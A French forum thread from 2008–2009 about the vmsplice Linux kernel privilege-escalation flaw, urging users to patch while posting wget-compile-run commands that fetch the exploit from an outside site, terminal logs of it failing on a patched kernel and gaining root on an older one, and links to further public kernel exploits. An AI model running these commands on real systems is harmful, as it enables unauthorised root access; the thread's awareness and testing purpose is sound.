Informatique-inside

Thibow · 23-02-2008 17:39:40

Attention tout le monde, mettez vos systèmes a jours !
Allez voir le tuto de conqueror pour mettre votre kernel a jour impérativement ici

Prévenu par Koreus et vu plus en détails sur l’excellent site Tux-planet, une horrible faille dans les kernels 2.6.17 à 2.6.24.1.
L’exploit dont parle Tux-Planet permet donc d’obtenir un accès root sur n’importe quelle machine à partir d’un compte user standard…

Voici un extrait de l’article de Tux Planet que je vous invite à consulter ici.

Code:

cd /tmp
wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
./vmsplice-local-root-exploit
…
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=505(sbilbeau)

[EDIT - Exploit public]
Kernel 2.6.19 (udp_sendmsg) => http://milw0rm.com/exploits/9575
Kernel 2.4/2.6 Linux sock_sendpage() NULL pointer dereference => http://milw0rm.com/exploits/9545
Kernel < 2.6.31 => http://milw0rm.com/exploits/9543
Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 => http://milw0rm.com/exploits/9542
Kernel 2.6.30 AppleTalk getsockname() => http://milw0rm.com/exploits/9521
Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure => http://milw0rm.com/exploits/9513

Y'en a moulte ... go to milw0rm ;-)

conqueror · 23-02-2008 23:52:05

La vache, pas mal l'exploit OO.

Après si tu le fais avec ssh, il faut encore avoir un mot de passe d'utilisateur normal :*.

Sous mandriva, tu ne peux avoir que le kernel 2.6.22 maximum en RPM... Je Conseille donc à tous les insideurs mandrivistes de télécharger un kernel à partir de kernel.org et de le compiler (je regarde la manip' a faire et puis après je fais un tuto pour mandriva).

Dernière modification par conqueror (24-02-2008 00:01:49)

Thibow · 24-02-2008 20:53:30

Wai ce ptin d'exploit fait vraiment bien baliser :s

Conqueror, t'as raison pour SSH, mais regarde, tu prend n'importe qu'elle site d'hébergement gratuit ou payant, tu prend l'hébergement, t'as quasiment une chance sur 3 de tomber sur un kernel faillible ... après faut voir si on peut exécuter des commande, mais dans pas de cas tu peux ... alors on peut facilement dire que beaucoup de site internet sont en danger actuellement ! (A savoir, pas mon hébergeur :p)

conqueror · 03-03-2008 13:19:27

Voici le résultat avec un noyau 2.6.24.3 fraichement compilé.

Code:

conqueror@conqueror-desktop:/tmp$ wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
--13:17:37--  http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
           => `vmsplice-local-root-exploit.c'
Résolution de public.tux-planet.fr... 213.186.33.2
Connexion vers public.tux-planet.fr|213.186.33.2|:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Longueur: 6 293 (6.1K) [text/x-csrc]

100%[====================================>] 6 293         --.--K/s

13:17:38 (53.20 KB/s) - « vmsplice-local-root-exploit.c » sauvegardé [6293/6293]

conqueror@conqueror-desktop:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.
gcc: vmsplice-local-root-exploit. : Aucun fichier ou répertoire de ce type
gcc: pas de fichier à l'entrée
conqueror@conqueror-desktop:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.
gcc: vmsplice-local-root-exploit. : Aucun fichier ou répertoire de ce type
gcc: pas de fichier à l'entrée
conqueror@conqueror-desktop:/tmp$ ./vmsplice-local-root-exploit
bash: ./vmsplice-local-root-exploit: Aucun fichier ou répertoire de ce type
conqueror@conqueror-desktop:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
conqueror@conqueror-desktop:/tmp$ ./vmsplice-local-root-exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dbd000 .. 0xb7def000
[-] vmsplice: Bad address
conqueror@conqueror-desktop:/tmp$

Bref ils peuvent toujours essayer chez moi, marchera pas =p

edit :

et voici le résultat avec un 2.6.22.* :

Code:

conqueror@conqueror-desktop:/tmp$ wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
--17:22:49--  http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
           => `vmsplice-local-root-exploit.c'
Résolution de public.tux-planet.fr... 213.186.33.2
Connexion vers public.tux-planet.fr|213.186.33.2|:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Longueur: 6 293 (6.1K) [text/x-csrc]

100%[====================================>] 6 293         --.--K/s

17:22:49 (103.34 KB/s) - « vmsplice-local-root-exploit.c » sauvegardé [6293/6293]

conqueror@conqueror-desktop:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
conqueror@conqueror-desktop:/tmp$ ./vmsplice-local-root-exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e21000 .. 0xb7e53000
[-] vmsplice: Bad address

Dernière modification par conqueror (03-03-2008 17:24:16)

Thibow · 03-03-2008 20:55:11

Ha bien

cabusar · 24-03-2008 13:52:50

un truc de sauvage tout de même

Thibow · 24-03-2008 21:28:48

Ca sent le vécu :p

cabusar · 25-03-2008 00:58:19

bah une fois j'ai essayé, il y a quelques années de recompiler mon kernel, je vous énumère pas la liste des trucs bizarre que m'a fait mon PC pour me faire comprendre qu'il en voulait pas

Thibow · 08-04-2008 01:02:39

Bon bah test chez moi ...

Code:

Thibow@thibow-atbj960j:~> cd Desktop
Thibow@thibow-atbj960j:~/Desktop> gcc ker_xpl.c -o xpl
Thibow@thibow-atbj960j:~/Desktop> chmod +x xpl
Thibow@thibow-atbj960j:~/Desktop> uname -a
Linux Thibow@thibow-atbj960j 2.6.22.13-0.3-default #1 SMP 2007/11/19 15:02:58 UTC x86_64 x86_64 x86_64 GNU/Linux
Thibow@thibow-atbj960j:~/Desktop> ./xpl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2aae6e921000 .. 0x2aae6e953000
[+] root
thibow-atbj960j:~/Desktop # whoami
root
thibow-atbj960j:~/Desktop #

conqueror · 08-04-2008 11:09:08

Sur un 2.6.?

Thibow · 08-04-2008 12:36:11

Linux Thibow@thibow-atbj960j 2.6.22.13-0.3-default #1 SMP 2007/11/19 15:02:58 UTC x86_64 x86_64 x86_64 GNU/Linux

^^

conqueror · 08-04-2008 13:03:46

ok ^^

cabusar · 12-04-2008 22:11:32

sont fou ces gens

Sh0ck · 08-03-2009 04:07:57

Payes ta faille, s'en est pas une, tu fais juste un wget pour récupérer la source en C, tu la compiles avec gcc et tu l'exécutes, rien à voir avec un "exploit".

cabusar · 08-03-2009 20:00:41

tu es conscient que ce topic a plus d'un an?

autre chose, quand on post en invité pour la première fois sur un topic on dit bonjour et on ne dénigre pas l'auteur en balançant des trucs qui sont incomplet.

merci

Sh0ck · 11-03-2009 16:05:23

Bonjour

Même en ayant plus d'un an, je trouve d'une, que l'exploit en question est totalement "à chier" et encore, je suis gentil, et de deux, je ne vois pas pourquoi je me présenterais alors qu'il y a des outils comme google pour se renseigner.

Pour de ce qui est de renseignements incomplets, je ne vois pas ce qu'il y a à ajouter à part qu'on télécharge une source en C avec wget, qu'on le compile avec gcc et qu'on l'exécute pour dire ensuite que ceci est un exploit.

cabusar · 12-03-2009 10:36:37

ah bah voilà c'est mieux

merci d'avoir complété, ce que tu avance n'engage que toi bien entendu mais son auteur te répondras surement

Pour ma part je ne me suis pas suffisamment penché sur ce topic pour émettre un jugement de valeur

inscrit toi au forum si tu veux, le fait de poster en invité m'énerve par défaut, mauvais souvenir

bonne continuation

Thibow · 12-03-2009 16:46:48

Il semblerai qu'on est pas la même définition d'un exploit ...
C'est bien de la source en C que nous parlons d'exploit hein ...

De plus, tu semble oublier les règles de bonne conduite a adopter ... sur n'importe quel site ou endroits communautaire ...

Personne ne t'oblige a poster des réponses aussi désinvolte ...!

Maintenant, tu semble avoir des connaissances qui m'échappe, alors nous attendons sans précédent une explication plus détaillé sur l'exploitation de ce kernel ...

C'est l'utilisation du framework Metasploit qui permet de mettre en oeuvre ces sources ... c'est exploit...

Bref, tu t'es probablement trompé de forum, ici on a pas cette mentalité.

Amicalement.

cabusar · 13-03-2009 09:22:00

/me se demande quand ça vas partir en troll ce topic

pourtant c'est bien partit

Sh0ck · 15-03-2009 14:54:21

Bonjour,

Je me suis donc inscrit pour ne pas énerver cabusar, donc pour de ce qui est règles de bonne conduite etc..., je ne pense pas que tu ais quelque chose à m'apprendre, après à toi de voir, j'ai juste une tendance à m'énerver un peu trop quand je vois des exploits comme ça, après si je me suis un peu trop laissé emporter, désolé, pour de ce qui est sécurité informatique et programmation, je pense savoir de quoi je parle, une simple recherche google vous le confirmera, sur ce, je vous laisse, je passerais de temps en temps.

Cordialement,

Dernière modification par Sh0ck (15-03-2009 14:57:03)

Thibow · 16-03-2009 09:03:58

Sans rancune mec !

Au plaisir de pouvoir échanger nos connaissances sur le forum

tryks · 22-08-2009 21:40:17

Sh0ck a dit exactement ce que je voulais dire.
En lisant ce topic, je tombais par terre...

.. · 05-09-2009 00:31:30

(Juste pour infos, l'exploit consiste a mapper une série d'adresse pour atterrir sur la mémoire du kernel, faire une recherche des drois du processus, et les modifiées (uid = 0, gid = 0, sid = 0 -> Processus avec tous les droits). Il fait une recherche exhaustif (La ptite structure qu'il balade dans toute la mémoire).
A première vue (J'avous avoir survoler ce problème) en mapan des adresses mémoire fixe, on parvenais a atteindre des segments de mémoire du kernel.
Ce n'est peut-être pas exacte mais c'est l'idée que j'ai retenus.

(Oui je m'ennuie ce soir/matin)

Informatique-inside

#1 23-02-2008 17:39:40

Faille dans les kernel LINUX !

Code:

#2 23-02-2008 23:52:05

Re: Faille dans les kernel LINUX !

#3 24-02-2008 20:53:30

Re: Faille dans les kernel LINUX !

#4 03-03-2008 13:19:27

Re: Faille dans les kernel LINUX !

Code:

Code:

#5 03-03-2008 20:55:11

Re: Faille dans les kernel LINUX !

#6 24-03-2008 13:52:50

Re: Faille dans les kernel LINUX !

#7 24-03-2008 21:28:48

Re: Faille dans les kernel LINUX !

#8 25-03-2008 00:58:19

Re: Faille dans les kernel LINUX !

#9 08-04-2008 01:02:39

Re: Faille dans les kernel LINUX !

Code:

#10 08-04-2008 11:09:08

Re: Faille dans les kernel LINUX !

#11 08-04-2008 12:36:11

Re: Faille dans les kernel LINUX !

#12 08-04-2008 13:03:46

Re: Faille dans les kernel LINUX !

#13 12-04-2008 22:11:32

Re: Faille dans les kernel LINUX !

#14 08-03-2009 04:07:57

Re: Faille dans les kernel LINUX !

#15 08-03-2009 20:00:41

Re: Faille dans les kernel LINUX !

#16 11-03-2009 16:05:23

Re: Faille dans les kernel LINUX !

#17 12-03-2009 10:36:37

Re: Faille dans les kernel LINUX !

#18 12-03-2009 16:46:48

Re: Faille dans les kernel LINUX !

#19 13-03-2009 09:22:00

Re: Faille dans les kernel LINUX !

#20 15-03-2009 14:54:21

Re: Faille dans les kernel LINUX !

#21 16-03-2009 09:03:58

Re: Faille dans les kernel LINUX !

#22 22-08-2009 21:40:17

Re: Faille dans les kernel LINUX !

#23 05-09-2009 00:31:30

Re: Faille dans les kernel LINUX !

Pied de page des forums